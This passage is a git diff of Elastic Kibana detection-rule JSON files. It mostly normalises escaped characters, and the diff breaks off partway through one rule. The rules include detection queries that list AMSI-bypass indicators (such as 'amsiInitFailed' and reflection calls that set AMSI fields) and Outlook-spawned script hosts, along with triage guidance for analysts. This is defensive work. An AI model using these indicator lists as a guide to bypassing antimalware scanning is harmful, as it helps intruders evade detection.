- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json
index 8fe8d5b9e60..a2b42d7bdb8 100644
--- a/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/1dee0500-4aeb-44ca-b24b-4a285d7b6ba1_5.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Inter-Process Communication via Outlook",
- "query": "sequence with maxspan=1m\n[process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n process.name : (\n \"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cmd.exe\", \"regsvr32.exe\", \"cscript.exe\", \"wscript.exe\"\n ) or\n (\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n (process.Ext.relative_file_creation_time \u003c= 500 or process.Ext.relative_file_name_modify_time \u003c= 500)\n )\n )\n] by process.executable\n[process where host.os.type == \"windows\" and event.action == \"start\" and process.name : \"OUTLOOK.EXE\" and\n process.Ext.effective_parent.name != null] by process.Ext.effective_parent.executable\n",
+ "query": "sequence with maxspan=1m\n[process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n process.name : (\n \"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cmd.exe\", \"regsvr32.exe\", \"cscript.exe\", \"wscript.exe\"\n ) or\n (\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n (process.Ext.relative_file_creation_time <= 500 or process.Ext.relative_file_name_modify_time <= 500)\n )\n )\n] by process.executable\n[process where host.os.type == \"windows\" and event.action == \"start\" and process.name : \"OUTLOOK.EXE\" and\n process.Ext.effective_parent.name != null] by process.Ext.effective_parent.executable\n",
 "references": [
 "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/apt29/Archive/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1"
 ],
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -107,7 +107,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json
index c5a55ac2f9c..c10c3e762e5 100644
--- a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_104.json
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -92,7 +92,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json
index 93c82ecc26d..10706dff3b7 100644
--- a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_105.json
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -91,7 +91,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json
index 2af42a556a2..c252bf650af 100644
--- a/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/1defdd62-cd8d-426e-a246-81a37751bb2b_106.json
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -92,7 +92,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json
index aca5b86bfcd..401724f92cd 100644
--- a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_1.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json
index fd80acc6de2..851b97bf18a 100644
--- a/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/1df1152b-610a-4f48-9d7a-504f6ee5d9da_2.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json
index 185818db86a..a23d00427ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_1.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 21,
 "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -158,7 +158,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json
index b54e7a89b57..333aa63f6c6 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_2.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 21,
 "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -163,7 +163,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json
index fc854fc78bb..698ea16d05d 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_3.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 21,
 "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -163,7 +163,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json
index 8db31cabce5..8791ddbfc37 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_4.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -162,7 +162,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json
index 837cb1cb027..9f1976e826c 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_101.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json
index 62618d7891d..50c0bfd53d6 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e0b832e-957e-43ae-b319-db82d228c908_102.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json
index e8e4fd57ebd..2f711710cd0 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_1.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json
index bc8edf82fdb..30ed7bf87e3 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -44,7 +44,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json
index e4d3fad717e..2259d9f7325 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_102.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -43,7 +43,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json
index 6faa41aa8c5..3ffa9c055f2 100644
--- a/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1e9fc667-9ff1-4b33-9f40-fefca8537eb0_103.json
@@ -38,7 +38,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -53,7 +53,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json
index 4a49f8f8972..3193d73cf81 100644
--- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_2.json
@@ -12,7 +12,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Potential Antimalware Scan Interface Bypass via PowerShell",
- "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. 
AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous 
entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or \n\t\t\t\t \"System.Management.Automation.ScriptBlock\" or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n )\n",
 "references": [
 "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell"
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json
index c03f9f460a1..c491f33685a 100644
--- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_3.json 
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE 